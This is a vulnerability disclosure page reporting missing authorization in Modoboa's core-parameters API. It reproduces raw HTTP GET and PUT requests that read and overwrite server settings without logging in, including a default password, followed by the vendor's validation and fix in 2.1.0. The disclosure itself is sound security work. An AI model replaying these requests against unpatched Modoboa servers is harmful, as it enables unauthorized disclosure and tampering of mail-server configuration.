Improper Authorization in modoboa/modoboa

Valid

Reported on

Feb 25th 2023


Description

During testing, it was observed that sending a GET request to the following endpoint: /api/v2/parameters/core/ returns sensitive information without any authentication or authorization.

Request

GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close


Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

The response contained sensitive information which could be used by an attacker to gain unauthorized access to the system. This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the information returns from the request can be modified using another PUT request.

Request

PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close

{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}

Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en


Proof of Concept

poc1.png

poc2.png

Impact

The impact of this vulnerability is severe, as it allows an attacker to gain sensitive information and modify it, posing a significant risk to the confidentiality and integrity of the system and its users' data. It is critical to address this vulnerability immediately to prevent any further exploitation by malicious actors.

References

We are processing your report and will contact the modoboa team within 24 hours. 3 months ago
7h3h4ckv157
3 months ago

Researcher


The changes directly made inside admin section

poc3.png

We have contacted a member of the modoboa team and are waiting to hear back 3 months ago
Antoine Nguyen validated this vulnerability 3 months ago
7h3h4ckv157 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
7h3h4ckv157
3 months ago

Researcher


I hope this will get fixed soon.

Regards,

7h3h4ckv157
2 months ago

Researcher


@Maintainer @Admin

Is it possible to add here: https://github.com/modoboa/modoboa/security/advisories

Antoine Nguyen marked this as fixed in 2.1.0 with commit 7bcd3f a month ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability a month ago
to join this conversation